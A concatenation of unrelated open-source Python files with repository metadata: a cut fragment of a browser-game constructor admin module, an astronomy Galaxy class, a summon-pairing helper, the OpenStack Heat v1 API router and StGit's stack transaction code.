vars = {
"title": self._("Verified WMID required"),
"text": self._("You haven't passed WMID verification yet"),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
# Registration on invitations
invitations = self.conf("constructor.invitations")
if invitations == 2:
vars = {
"title": self._("Registration closed"),
"text": self.conf("constructor.invitations-text", self._("Open registration of new games is unavailable at the moment")),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
elif invitations:
if not self.call("invitation.ok", req.user(), "newproject"):
invitation = req.param("invitation")
form = self.call("web.form")
if req.param("ok"):
if not invitation or invitation == "":
form.error("invitation", self._("Enter invitation code"))
else:
err = self.call("invitation.enter", req.user(), "newproject", invitation)
if err:
form.error("invitation", err)
if not form.errors:
self.call("web.redirect", "/constructor/newgame")
form.input(self._("Invitation code"), "invitation", invitation)
form.submit(None, None, self._("Proceed"))
form.add_message_top(self.conf("constructor.invitations-text", self._("Open registration of new games is unavailable at the moment")))
vars = {
"title": self._("Invitation required"),
}
self.call("web.response_global", form.html(), vars)
inst = self.app().inst
# creating new project and application
int_app = inst.int_app
project = int_app.obj(Project)
project.set("created", self.now())
project.set("owner", req.user())
project.set("inactive", 1)
project.set("storage", 2)
project.set("keyspace", "eden")
project.store()
# accessing new application
app = inst.appfactory.get_by_tag(project.uuid)
# setting up everything
app.hooks.call("app.check")
# creating setup wizard
app.hooks.call("wizards.new", "mg.constructor.setup.ProjectSetupWizard")
self.call("web.redirect", "http://%s/admin" % app.domain)
def constructor_game(self):
req = self.req()
try:
project = self.int_app().obj(Project, req.args)
except ObjectNotFoundException:
self.call("web.not_found")
if project.get("owner") != req.user():
self.call("web.forbidden")
app = self.app().inst.appfactory.get_by_tag(project.uuid)
domain = project.get("domain")
if domain is None:
domain = "%s.%s" % (project.uuid, self.conf("constructor.projects-domain", self.main_host))
else:
domain = "www.%s" % domain
admins = app.objlist(DBCharacterList, query_index="admin", query_equal="1")
if not len(admins):
self.call("web.redirect", "http://%s" % domain)
admin = admins[0]
# restoring admin rights
perms = app.hooks.call("auth.permissions", admin.uuid)
if not perms.get("project.admin"):
self.info("Restoring admin permissions for user %s", admin.uuid)
app.hooks.call("auth.grant-permission", admin.uuid, "project.admin")
# logging in
autologin = app.hooks.call("auth.autologin", admin.uuid)
self.call("web.redirect", "http://%s/auth/autologin/%s" % (domain, autologin))
def cleanup(self, tag):
inst = self.app().inst
int_app = inst.int_app
app = inst.appfactory.get_by_tag(tag)
int_app.sql_write.do("delete from queue_tasks where app=?", tag)
sched = int_app.obj(Schedule, tag, silent=True)
sched.remove()
project = int_app.obj(Project, tag, silent=True)
project.remove()
if app is not None:
sessions = app.objlist(SessionList, query_index="valid_till")
sessions.remove()
users = app.objlist(UserList, query_index="created")
users.remove()
perms = app.objlist(UserPermissionsList, users.uuids())
perms.remove()
config = app.objlist(DBConfigGroupList, query_index="all")
config.remove()
hook_modules = app.objlist(DBHookGroupModulesList, query_index="all")
hook_modules.remove()
wizards = app.objlist(WizardConfigList, query_index="all")
wizards.remove()
temp_files = int_app.objlist(DBTempFileList, query_index="app", query_equal=tag)
temp_files.load(silent=True)
for file in temp_files:
file.delete()
temp_files.remove()
def password_changed(self, user, password):
self.info("Changed password of user %s", user.uuid)
projects = self.app().inst.int_app.objlist(ProjectList, query_index="owner", query_equal=user.uuid)
projects.load(silent=True)
for project in projects:
app = self.app().inst.appfactory.get_by_tag(project.uuid)
users = app.objlist(UserList, query_index="name", query_equal=user.get("name"))
users.load(silent=True)
for u in users:
self.info("Replicated password to the user %s in the project %s", u.uuid, project.uuid)
u.set("salt", user.get("salt"))
u.set("pass_reminder", user.get("pass_reminder"))
u.set("pass_hash", user.get("pass_hash"))
u.store()
def indexpage_render(self, vars):
fields = [
{"code": "name", "prompt": self._("Enter your name, please"), "type": 0},
{"code": "sex", "prompt": self._("What\\'s your sex"), "type": 1, "values": [[0, "Male"], [1, "Female", True]]},
{"code": "motto", "prompt": self._("This is a very long text asking you to enter your motto. So be so kind entering your motto"), "type": 2},
{"code": "password", "prompt": self._("Enter your password")},
]
vars["register_fields"] = fields
def telegrams_params(self, params):
params["menu_title"] = self._("telegrams menu///Post")
params["page_title"] = self._("Messages")
params["last_telegram"] = self._("Last message")
params["all_telegrams"] = self._("All messages")
params["send_telegram"] = self._("Send a new message")
params["text"] = self._("Message text")
params["system_name"] = self._("MMO Constructor")
params["telegrams_with"] = self._("Correspondence with {0}")
params["ignore_list"] = self._("Ignore list")
def email_sender(self, params):
params["email"] = "robot@%s" % self.main_app().main_host
params["name"] = self._("MMO Constructor")
params["prefix"] = "[mmo] "
params["signature"] = self._("MMO Constructor - {protocol}://www.{host} - constructor of browser-based online games").format(protocol=self.main_app().protocol, host=self.main_host)
def wmlogin_authorized(self, authtype, remote_addr, wmid):
req = self.req()
with self.lock(["WMLogin.%s" % req.user(), "WMLogin.%s" % wmid]):
self.debug("User %s uses WMID %s", req.user(), wmid)
wmids = self.wmid_check(req.user())
self.debug("Authorized WMIDS are: %s", wmids)
if wmids and wmid not in wmids:
vars = {
"title": self._("WMID verified already"),
"text": self._("You have verified another WMID already: %s") % (', '.join(wmids)),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
else:
cert = self.call("wmcert.get", wmid)
self.debug("Certificate of %s is %s", wmid, cert)
if cert < 110:
vars = {
"title": self._("WMID not verified"),
"text": self._('We have ensured your WMID is <strong>{wmid}</strong>. But to our regret you has not even formal certificate. Please <a href="https://passport.wmtransfer.com/asp/aProcess.asp">get the formal certificate</a> (data are not verified by notaries or the center\'s legal department) and retry WMID verification').format(wmid=wmid, cert=self.cert_name(cert)),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
if not wmids or wmid not in wmids:
lst = self.objlist(DBUserWMIDList, query_index="wmid", query_equal=wmid)
lst.load()
if len(lst):
user = self.obj(User, lst[0].get("user"))
vars = {
"title": self._("WMID is assigned to another user"),
"text": self._("This WMID is assigned already to the user <strong>%s</strong>. You can't assign one WMID to several accounts") % htmlescape(user.get("name")),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
obj = self.obj(DBUserWMID)
obj.set("added", self.now())
obj.set("user", req.user())
obj.set("wmid", wmid)
obj.set("cert", cert)
obj.set("authtype", authtype)
obj.set("ip", remote_addr)
obj.store()
elif cert > wmids[wmid]:
lst = self.objlist(DBUserWMIDList, query_index="wmid", query_equal=wmid)
lst.load()
for ent in lst:
ent.set("cert", cert)
ent.store()
vars = {
"title": self._("WMID verified"),
"text": self._("We have verified your WMID <strong>{wmid}</strong> successfully. Certificate level: <strong>{cert}>/strong>").format(wmid=wmid, cert=self.cert_name(cert)),
}
self.call("web.response_template", "constructor/setup/info.html", vars)
def wmid_check(self, user_uuid):
lst = self.objlist(DBUserWMIDList, query_index="user", query_equal=user_uuid)
if not len(lst):
return None
lst.load()
return dict([(ent.get("wmid"), ent.get("cert")) for ent in lst])
def auth_user_table(self, user, tbl):
req = self.req()
if req.has_access("auth.wmid"):
wmids = self.wmid_check(user.uuid)
tbl["rows"].append([self._("Authorized WMID"), ', '.join([u'<strong>{wmid}</strong> ({cert}) — <hook:admin.link href="wmauth/remove/{user}/{wmid}" title="{remove}" confirm="{confirm}" />'.format(cert=self._("wm///certificate: %s") % self.cert_name(cert), wmid=wmid, user=user.uuid, remove=self._("remove"), confirm=self._("Are you sure want to delete this WMID?")) for wmid, cert in wmids.iteritems()]) if wmids else self._("none")])
def wmauth_remove(self):
req = self.req()
m = re_wmauth_remove.match(req.args)
if not m:
self.call("web.not_found")
user_uuid, wmid = m.group(1, 2)
lst = self.objlist(DBUserWMIDList, query_index="user", query_equal=user_uuid)
lst.load()
for ent in lst:
if ent.get("wmid") == wmid:
ent.remove()
self.call("admin.redirect", "auth/user-dashboard/%s" % user_uuid, {"active_tab": "auth"})
def list_roles(self, roles):
roles.append(("wmid", self._("Authorized WMID")))
roles.append(("nowmid", self._("Not authorized WMID")))
def users_roles(self, users, roles):
authorized = set()
lst = self.objlist(DBUserWMIDList, query_index="user", query_equal=users)
lst.load()
for ent in lst:
authorized.add(ent.get("user"))
for user in users:
role = "wmid" if user in authorized else "nowmid"
try:
roles[user].append(role)
except KeyError:
roles[user] = [rol]
|
JoyTeam/metagam
|
mg/constructor/admin.py
|
Python
|
gpl-3.0
| 42,144
|
"""
#;+
#; NAME:
#; galaxy.core
#; Version 1.0
#;
#; PURPOSE:
#; Core routines for galaxy analysis
#; 29-Nov-2014 by JXP
#;-
#;------------------------------------------------------------------------------
"""
from __future__ import print_function, absolute_import, division, unicode_literals
import os, copy, sys
import numpy as np
from astropy import units as u
from astropy.io import ascii
from astropy.coordinates import SkyCoord
from xastropy.xutils import xdebug as xdb
# Class for LLS Absorption Lines
class Galaxy(object):
"""A Galaxy Class
Attributes:
name: string
Name(s)
z: float
Adopted redshift
coord: Coordinates
mstar: float
Stellar mass (MsolMass)
"""
# Initialize with a .dat file
def __init__(self, ra=None, dec=None, z=0.):
self.z = z
# Coord
if ra is None:
ras = '00 00 00'
else:
ras = str(ra)
if dec is None:
decs = '+00 00 00'
else:
decs = str(dec)
self.coord = SkyCoord(ras, decs, 'icrs', unit=(u.hour, u.deg))
# Name
self.name = ('J'+
self.coord.ra.to_string(unit=u.hour,sep='',pad=True)+
self.coord.dec.to_string(sep='',pad=True,alwayssign=True))
# #############
def __repr__(self):
return ('[Galaxy: {:s} {:s} {:s}, z={:g}]'.format(
self.name,
self.coord.ra.to_string(unit=u.hour,sep=':',pad=True),
self.coord.dec.to_string(sep=':',pad=True),
self.z) )
## #################################
## #################################
## TESTING
## #################################
if __name__ == '__main__':
# Instantiate
gal = Galaxy()
print(gal)
|
astronomeara/xastropy-old
|
xastropy/galaxy/core.py
|
Python
|
bsd-3-clause
| 1,859
|
class SummonList:
def __init__(self, my_summons, helper_summons):
self.my_summons = my_summons
self.helper_summons = helper_summons
# Pair your summon with each friend list summon
# @return List of summon pairs
@property
def summon_pairs(self):
summon_pair_list = []
for mine in self.my_summons:
for helper in self.helper_summons:
summon_pair_list.append((mine, helper))
return summon_pair_list
|
adangtran87/gbf-weap
|
summon_list.py
|
Python
|
mit
| 484
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import routes
import six
from heat.api.openstack.v1 import actions
from heat.api.openstack.v1 import build_info
from heat.api.openstack.v1 import events
from heat.api.openstack.v1 import resources
from heat.api.openstack.v1 import services
from heat.api.openstack.v1 import software_configs
from heat.api.openstack.v1 import software_deployments
from heat.api.openstack.v1 import stacks
from heat.common import wsgi
class API(wsgi.Router):
"""WSGI router for Heat v1 REST API requests."""
def __init__(self, conf, **local_conf):
self.conf = conf
mapper = routes.Mapper()
default_resource = wsgi.Resource(wsgi.DefaultMethodController(),
wsgi.JSONRequestDeserializer())
def connect(controller, path_prefix, routes):
"""Connects list of routes to given controller with path_prefix.
This function connects the list of routes to the given
controller, prepending the given path_prefix. Then for each URL it
finds which request methods aren't handled and configures those
to return a 405 error. Finally, it adds a handler for the
OPTIONS method to all URLs that returns the list of allowed
methods with 204 status code.
"""
# register the routes with the mapper, while keeping track of which
# methods are defined for each URL
urls = {}
for r in routes:
url = path_prefix + r['url']
methods = r['method']
if isinstance(methods, six.string_types):
methods = [methods]
methods_str = ','.join(methods)
mapper.connect(r['name'], url, controller=controller,
action=r['action'],
conditions={'method': methods_str})
if url not in urls:
urls[url] = methods
else:
urls[url] += methods
# now register the missing methods to return 405s, and register
# a handler for OPTIONS that returns the list of allowed methods
for url, methods in urls.items():
all_methods = ['HEAD', 'GET', 'POST', 'PUT', 'PATCH', 'DELETE']
missing_methods = [m for m in all_methods if m not in methods]
allowed_methods_str = ','.join(methods)
mapper.connect(url,
controller=default_resource,
action='reject',
allowed_methods=allowed_methods_str,
conditions={'method': missing_methods})
if 'OPTIONS' not in methods:
mapper.connect(url,
controller=default_resource,
action='options',
allowed_methods=allowed_methods_str,
conditions={'method': 'OPTIONS'})
# Stacks
stacks_resource = stacks.create_resource(conf)
connect(controller=stacks_resource,
path_prefix='/{tenant_id}',
routes=[
# Template handling
{
'name': 'template_validate',
'url': '/validate',
'action': 'validate_template',
'method': 'POST'
},
{
'name': 'resource_types',
'url': '/resource_types',
'action': 'list_resource_types',
'method': 'GET'
},
{
'name': 'resource_schema',
'url': '/resource_types/{type_name}',
'action': 'resource_schema',
'method': 'GET'
},
{
'name': 'generate_template',
'url': '/resource_types/{type_name}/template',
'action': 'generate_template',
'method': 'GET'
},
{
'name': 'template_versions',
'url': '/template_versions',
'action': 'list_template_versions',
'method': 'GET'
},
{
'name': 'template_functions',
'url': '/template_versions/{template_version}'
'/functions',
'action': 'list_template_functions',
'method': 'GET'
},
# Stack collection
{
'name': 'stack_index',
'url': '/stacks',
'action': 'index',
'method': 'GET'
},
{
'name': 'stack_create',
'url': '/stacks',
'action': 'create',
'method': 'POST'
},
{
'name': 'stack_preview',
'url': '/stacks/preview',
'action': 'preview',
'method': 'POST'
},
{
'name': 'stack_detail',
'url': '/stacks/detail',
'action': 'detail',
'method': 'GET'
},
# Stack data
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}',
'action': 'lookup',
'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
},
# \x3A matches on a colon.
# Routes treats : specially in its regexp
{
'name': 'stack_lookup',
'url': r'/stacks/{stack_name:arn\x3A.*}',
'action': 'lookup',
'method': ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
},
{
'name': 'stack_lookup_subpath',
'url': '/stacks/{stack_name}/'
'{path:resources|events|template|actions}',
'action': 'lookup',
'method': 'GET'
},
{
'name': 'stack_lookup_subpath_post',
'url': '/stacks/{stack_name}/'
'{path:resources|events|template|actions}',
'action': 'lookup',
'method': 'POST'
},
{
'name': 'stack_show',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'stack_lookup',
'url': '/stacks/{stack_name}/{stack_id}/template',
'action': 'template',
'method': 'GET'
},
# Stack update/delete
{
'name': 'stack_update',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'update',
'method': 'PUT'
},
{
'name': 'stack_update_patch',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'update_patch',
'method': 'PATCH'
},
{
'name': 'preview_stack_update',
'url': '/stacks/{stack_name}/{stack_id}/preview',
'action': 'preview_update',
'method': 'PUT'
},
{
'name': 'preview_stack_update_patch',
'url': '/stacks/{stack_name}/{stack_id}/preview',
'action': 'preview_update_patch',
'method': 'PATCH'
},
{
'name': 'stack_delete',
'url': '/stacks/{stack_name}/{stack_id}',
'action': 'delete',
'method': 'DELETE'
},
# Stack abandon
{
'name': 'stack_abandon',
'url': '/stacks/{stack_name}/{stack_id}/abandon',
'action': 'abandon',
'method': 'DELETE'
},
{
'name': 'stack_export',
'url': '/stacks/{stack_name}/{stack_id}/export',
'action': 'export',
'method': 'GET'
},
{
'name': 'stack_snapshot',
'url': '/stacks/{stack_name}/{stack_id}/snapshots',
'action': 'snapshot',
'method': 'POST'
},
{
'name': 'stack_snapshot_show',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}',
'action': 'show_snapshot',
'method': 'GET'
},
{
'name': 'stack_snapshot_delete',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}',
'action': 'delete_snapshot',
'method': 'DELETE'
},
{
'name': 'stack_list_snapshots',
'url': '/stacks/{stack_name}/{stack_id}/snapshots',
'action': 'list_snapshots',
'method': 'GET'
},
{
'name': 'stack_snapshot_restore',
'url': '/stacks/{stack_name}/{stack_id}/snapshots/'
'{snapshot_id}/restore',
'action': 'restore_snapshot',
'method': 'POST'
},
# Stack outputs
{
'name': 'stack_output_list',
'url': '/stacks/{stack_name}/{stack_id}/outputs',
'action': 'list_outputs',
'method': 'GET'
},
{
'name': 'stack_output_show',
'url': '/stacks/{stack_name}/{stack_id}/outputs/'
'{output_key}',
'action': 'show_output',
'method': 'GET'
}
])
# Resources
resources_resource = resources.create_resource(conf)
stack_path = '/{tenant_id}/stacks/{stack_name}/{stack_id}'
connect(controller=resources_resource, path_prefix=stack_path,
routes=[
# Resource collection
{
'name': 'resource_index',
'url': '/resources',
'action': 'index',
'method': 'GET'
},
# Resource data
{
'name': 'resource_show',
'url': '/resources/{resource_name}',
'action': 'show',
'method': 'GET'
},
{
'name': 'resource_metadata_show',
'url': '/resources/{resource_name}/metadata',
'action': 'metadata',
'method': 'GET'
},
{
'name': 'resource_signal',
'url': '/resources/{resource_name}/signal',
'action': 'signal',
'method': 'POST'
},
{
'name': 'resource_mark_unhealthy',
'url': '/resources/{resource_name}',
'action': 'mark_unhealthy',
'method': 'PATCH'
}
])
# Events
events_resource = events.create_resource(conf)
connect(controller=events_resource, path_prefix=stack_path,
routes=[
# Stack event collection
{
'name': 'event_index_stack',
'url': '/events',
'action': 'index',
'method': 'GET'
},
# Resource event collection
{
'name': 'event_index_resource',
'url': '/resources/{resource_name}/events',
'action': 'index',
'method': 'GET'
},
# Event data
{
'name': 'event_show',
'url': '/resources/{resource_name}/events/{event_id}',
'action': 'show',
'method': 'GET'
}
])
# Actions
actions_resource = actions.create_resource(conf)
connect(controller=actions_resource, path_prefix=stack_path,
routes=[
{
'name': 'action_stack',
'url': '/actions',
'action': 'action',
'method': 'POST'
}
])
# Info
info_resource = build_info.create_resource(conf)
connect(controller=info_resource, path_prefix='/{tenant_id}',
routes=[
{
'name': 'build_info',
'url': '/build_info',
'action': 'build_info',
'method': 'GET'
}
])
# Software configs
software_config_resource = software_configs.create_resource(conf)
connect(controller=software_config_resource,
path_prefix='/{tenant_id}/software_configs',
routes=[
{
'name': 'software_config_index',
'url': '',
'action': 'index',
'method': 'GET'
},
{
'name': 'software_config_create',
'url': '',
'action': 'create',
'method': 'POST'
},
{
'name': 'software_config_show',
'url': '/{config_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'software_config_delete',
'url': '/{config_id}',
'action': 'delete',
'method': 'DELETE'
}
])
# Software deployments
sd_resource = software_deployments.create_resource(conf)
connect(controller=sd_resource,
path_prefix='/{tenant_id}/software_deployments',
routes=[
{
'name': 'software_deployment_index',
'url': '',
'action': 'index',
'method': 'GET'
},
{
'name': 'software_deployment_metadata',
'url': '/metadata/{server_id}',
'action': 'metadata',
'method': 'GET'
},
{
'name': 'software_deployment_create',
'url': '',
'action': 'create',
'method': 'POST'
},
{
'name': 'software_deployment_show',
'url': '/{deployment_id}',
'action': 'show',
'method': 'GET'
},
{
'name': 'software_deployment_update',
'url': '/{deployment_id}',
'action': 'update',
'method': 'PUT'
},
{
'name': 'software_deployment_delete',
'url': '/{deployment_id}',
'action': 'delete',
'method': 'DELETE'
}
])
# Services
service_resource = services.create_resource(conf)
with mapper.submapper(
controller=service_resource,
path_prefix='/{tenant_id}/services'
) as sa_mapper:
sa_mapper.connect("service_index",
"",
action="index",
conditions={'method': 'GET'})
# now that all the routes are defined, add a handler for
super(API, self).__init__(mapper)
|
jasondunsmore/heat
|
heat/api/openstack/v1/__init__.py
|
Python
|
apache-2.0
| 18,979
|
"""The L{StackTransaction} class makes it possible to make complex
updates to an StGit stack in a safe and convenient way."""
import atexit
import itertools as it
from stgit import exception, utils
from stgit.utils import any, all
from stgit.out import *
from stgit.lib import git, log
from stgit.config import config
class TransactionException(exception.StgException):
"""Exception raised when something goes wrong with a
L{StackTransaction}."""
class TransactionHalted(TransactionException):
"""Exception raised when a L{StackTransaction} stops part-way through.
Used to make a non-local jump from the transaction setup to the
part of the transaction code where the transaction is run."""
def _print_current_patch(old_applied, new_applied):
def now_at(pn):
out.info('Now at patch "%s"' % pn)
if not old_applied and not new_applied:
pass
elif not old_applied:
now_at(new_applied[-1])
elif not new_applied:
out.info('No patch applied')
elif old_applied[-1] == new_applied[-1]:
pass
else:
now_at(new_applied[-1])
class _TransPatchMap(dict):
"""Maps patch names to sha1 strings."""
def __init__(self, stack):
dict.__init__(self)
self.__stack = stack
def __getitem__(self, pn):
try:
return dict.__getitem__(self, pn)
except KeyError:
return self.__stack.patches.get(pn).commit
class StackTransaction(object):
"""A stack transaction, used for making complex updates to an StGit
stack in one single operation that will either succeed or fail
cleanly.
The basic theory of operation is the following:
1. Create a transaction object.
2. Inside a::
try
...
except TransactionHalted:
pass
block, update the transaction with e.g. methods like
L{pop_patches} and L{push_patch}. This may create new git
objects such as commits, but will not write any refs; this means
that in case of a fatal error we can just walk away, no clean-up
required.
(Some operations may need to touch your index and working tree,
though. But they are cleaned up when needed.)
3. After the C{try} block -- wheher or not the setup ran to
completion or halted part-way through by raising a
L{TransactionHalted} exception -- call the transaction's L{run}
method. This will either succeed in writing the updated state to
your refs and index+worktree, or fail without having done
anything."""
def __init__(self, stack, msg, discard_changes = False,
allow_conflicts = False, allow_bad_head = False,
check_clean_iw = None):
"""Create a new L{StackTransaction}.
@param discard_changes: Discard any changes in index+worktree
@type discard_changes: bool
@param allow_conflicts: Whether to allow pre-existing conflicts
@type allow_conflicts: bool or function of L{StackTransaction}"""
self.__stack = stack
self.__msg = msg
self.__patches = _TransPatchMap(stack)
self.__applied = list(self.__stack.patchorder.applied)
self.__unapplied = list(self.__stack.patchorder.unapplied)
self.__hidden = list(self.__stack.patchorder.hidden)
self.__conflicting_push = None
self.__error = None
self.__current_tree = self.__stack.head.data.tree
self.__base = self.__stack.base
self.__discard_changes = discard_changes
self.__bad_head = None
self.__conflicts = None
if isinstance(allow_conflicts, bool):
self.__allow_conflicts = lambda trans: allow_conflicts
else:
self.__allow_conflicts = allow_conflicts
self.__temp_index = self.temp_index_tree = None
if not allow_bad_head:
self.__assert_head_top_equal()
if check_clean_iw:
self.__assert_index_worktree_clean(check_clean_iw)
stack = property(lambda self: self.__stack)
patches = property(lambda self: self.__patches)
def __set_applied(self, val):
self.__applied = list(val)
applied = property(lambda self: self.__applied, __set_applied)
def __set_unapplied(self, val):
self.__unapplied = list(val)
unapplied = property(lambda self: self.__unapplied, __set_unapplied)
def __set_hidden(self, val):
self.__hidden = list(val)
hidden = property(lambda self: self.__hidden, __set_hidden)
all_patches = property(lambda self: (self.__applied + self.__unapplied
+ self.__hidden))
def __set_base(self, val):
assert (not self.__applied
or self.patches[self.applied[0]].data.parent == val)
self.__base = val
base = property(lambda self: self.__base, __set_base)
@property
def temp_index(self):
if not self.__temp_index:
self.__temp_index = self.__stack.repository.temp_index()
atexit.register(self.__temp_index.delete)
return self.__temp_index
@property
def top(self):
if self.__applied:
return self.__patches[self.__applied[-1]]
else:
return self.__base
def __get_head(self):
if self.__bad_head:
return self.__bad_head
else:
return self.top
def __set_head(self, val):
self.__bad_head = val
head = property(__get_head, __set_head)
def __assert_head_top_equal(self):
if not self.__stack.head_top_equal():
out.error(
'HEAD and top are not the same.',
'This can happen if you modify a branch with git.',
'"stg repair --help" explains more about what to do next.')
self.__abort()
def __assert_index_worktree_clean(self, iw):
if not iw.worktree_clean():
self.__halt('Worktree not clean. Use "refresh" or "status --reset"')
if not iw.index.is_clean(self.stack.head):
self.__halt('Index not clean. Use "refresh" or "status --reset"')
def __checkout(self, tree, iw, allow_bad_head):
if not allow_bad_head:
self.__assert_head_top_equal()
if self.__current_tree == tree and not self.__discard_changes:
# No tree change, but we still want to make sure that
# there are no unresolved conflicts. Conflicts
# conceptually "belong" to the topmost patch, and just
# carrying them along to another patch is confusing.
if (self.__allow_conflicts(self) or iw == None
or not iw.index.conflicts()):
return
out.error('Need to resolve conflicts first')
self.__abort()
assert iw != None
if self.__discard_changes:
iw.checkout_hard(tree)
else:
iw.checkout(self.__current_tree, tree)
self.__current_tree = tree
@staticmethod
def __abort():
raise TransactionException(
'Command aborted (all changes rolled back)')
def __check_consistency(self):
remaining = set(self.all_patches)
for pn, commit in self.__patches.iteritems():
if commit == None:
assert self.__stack.patches.exists(pn)
else:
assert pn in remaining
def abort(self, iw = None):
# The only state we need to restore is index+worktree.
if iw:
self.__checkout(self.__stack.head.data.tree, iw,
allow_bad_head = True)
def run(self, iw = None, set_head = True, allow_bad_head = False,
print_current_patch = True):
"""Execute the transaction. Will either succeed, or fail (with an
exception) and do nothing."""
self.__check_consistency()
log.log_external_mods(self.__stack)
new_head = self.head
# Set branch head.
if set_head:
if iw:
try:
self.__checkout(new_head.data.tree, iw, allow_bad_head)
except git.CheckoutException:
# We have to abort the transaction.
self.abort(iw)
self.__abort()
self.__stack.set_head(new_head, self.__msg)
if self.__error:
if self.__conflicts:
out.error(*([self.__error] + self.__conflicts))
else:
out.error(self.__error)
# Write patches.
def write(msg):
for pn, commit in self.__patches.iteritems():
if self.__stack.patches.exists(pn):
p = self.__stack.patches.get(pn)
if commit == None:
p.delete()
else:
p.set_commit(commit, msg)
else:
self.__stack.patches.new(pn, commit, msg)
self.__stack.patchorder.applied = self.__applied
self.__stack.patchorder.unapplied = self.__unapplied
self.__stack.patchorder.hidden = self.__hidden
log.log_entry(self.__stack, msg)
old_applied = self.__stack.patchorder.applied
write(self.__msg)
if self.__conflicting_push != None:
self.__patches = _TransPatchMap(self.__stack)
self.__conflicting_push()
write(self.__msg + ' (CONFLICT)')
if print_current_patch:
_print_current_patch(old_applied, self.__applied)
if self.__error:
return utils.STGIT_CONFLICT
else:
return utils.STGIT_SUCCESS
def __halt(self, msg):
self.__error = msg
raise TransactionHalted(msg)
@staticmethod
def __print_popped(popped):
if len(popped) == 0:
pass
elif len(popped) == 1:
out.info('Popped %s' % popped[0])
else:
out.info('Popped %s -- %s' % (popped[-1], popped[0]))
def pop_patches(self, p):
"""Pop all patches pn for which p(pn) is true. Return the list of
other patches that had to be popped to accomplish this. Always
succeeds."""
popped = []
for i in xrange(len(self.applied)):
if p(self.applied[i]):
popped = self.applied[i:]
del self.applied[i:]
break
popped1 = [pn for pn in popped if not p(pn)]
popped2 = [pn for pn in popped if p(pn)]
self.unapplied = popped1 + popped2 + self.unapplied
self.__print_popped(popped)
return popped1
def delete_patches(self, p, quiet = False):
"""Delete all patches pn for which p(pn) is true. Return the list of
other patches that had to be popped to accomplish this. Always
succeeds."""
popped = []
all_patches = self.applied + self.unapplied + self.hidden
for i in xrange(len(self.applied)):
if p(self.applied[i]):
popped = self.applied[i:]
del self.applied[i:]
break
popped = [pn for pn in popped if not p(pn)]
self.unapplied = popped + [pn for pn in self.unapplied if not p(pn)]
self.hidden = [pn for pn in self.hidden if not p(pn)]
self.__print_popped(popped)
for pn in all_patches:
if p(pn):
s = ['', ' (empty)'][self.patches[pn].data.is_nochange()]
self.patches[pn] = None
if not quiet:
out.info('Deleted %s%s' % (pn, s))
return popped
def push_patch(self, pn, iw = None, allow_interactive = False,
already_merged = False):
"""Attempt to push the named patch. If this results in conflicts,
halts the transaction. If index+worktree are given, spill any
conflicts to them."""
out.start('Pushing patch "%s"' % pn)
orig_cd = self.patches[pn].data
cd = orig_cd.set_committer(None)
oldparent = cd.parent
cd = cd.set_parent(self.top)
if already_merged:
# the resulting patch is empty
tree = cd.parent.data.tree
else:
base = oldparent.data.tree
ours = cd.parent.data.tree
theirs = cd.tree
tree, self.temp_index_tree = self.temp_index.merge(
base, ours, theirs, self.temp_index_tree)
s = ''
merge_conflict = False
if not tree:
if iw == None:
self.__halt('%s does not apply cleanly' % pn)
try:
self.__checkout(ours, iw, allow_bad_head = False)
except git.CheckoutException:
self.__halt('Index/worktree dirty')
try:
interactive = (allow_interactive and
config.get('stgit.autoimerge') == 'yes')
iw.merge(base, ours, theirs, interactive = interactive)
tree = iw.index.write_tree()
self.__current_tree = tree
s = 'modified'
except git.MergeConflictException, e:
tree = ours
merge_conflict = True
self.__conflicts = e.conflicts
s = 'conflict'
except git.MergeException, e:
self.__halt(str(e))
cd = cd.set_tree(tree)
if any(getattr(cd, a) != getattr(orig_cd, a) for a in
['parent', 'tree', 'author', 'message']):
comm = self.__stack.repository.commit(cd)
if merge_conflict:
# When we produce a conflict, we'll run the update()
# function defined below _after_ having done the
# checkout in run(). To make sure that we check out
# the real stack top (as it will look after update()
# has been run), set it hard here.
self.head = comm
else:
comm = None
s = 'unmodified'
if already_merged:
s = 'merged'
elif not merge_conflict and cd.is_nochange():
s = 'empty'
out.done(s)
def update():
if comm:
self.patches[pn] = comm
if pn in self.hidden:
x = self.hidden
else:
x = self.unapplied
del x[x.index(pn)]
self.applied.append(pn)
if merge_conflict:
# We've just caused conflicts, so we must allow them in
# the final checkout.
self.__allow_conflicts = lambda trans: True
# Save this update so that we can run it a little later.
self.__conflicting_push = update
self.__halt("%d merge conflict(s)" % len(self.__conflicts))
else:
# Update immediately.
update()
def push_tree(self, pn):
"""Push the named patch without updating its tree."""
orig_cd = self.patches[pn].data
cd = orig_cd.set_committer(None).set_parent(self.top)
s = ''
if any(getattr(cd, a) != getattr(orig_cd, a) for a in
['parent', 'tree', 'author', 'message']):
self.patches[pn] = self.__stack.repository.commit(cd)
else:
s = ' (unmodified)'
if cd.is_nochange():
s = ' (empty)'
out.info('Pushed %s%s' % (pn, s))
if pn in self.hidden:
x = self.hidden
else:
x = self.unapplied
del x[x.index(pn)]
self.applied.append(pn)
def reorder_patches(self, applied, unapplied, hidden = None, iw = None):
"""Push and pop patches to attain the given ordering."""
if hidden is None:
hidden = self.hidden
common = len(list(it.takewhile(lambda (a, b): a == b,
zip(self.applied, applied))))
to_pop = set(self.applied[common:])
self.pop_patches(lambda pn: pn in to_pop)
for pn in applied[common:]:
self.push_patch(pn, iw)
assert self.applied == applied
assert set(self.unapplied + self.hidden) == set(unapplied + hidden)
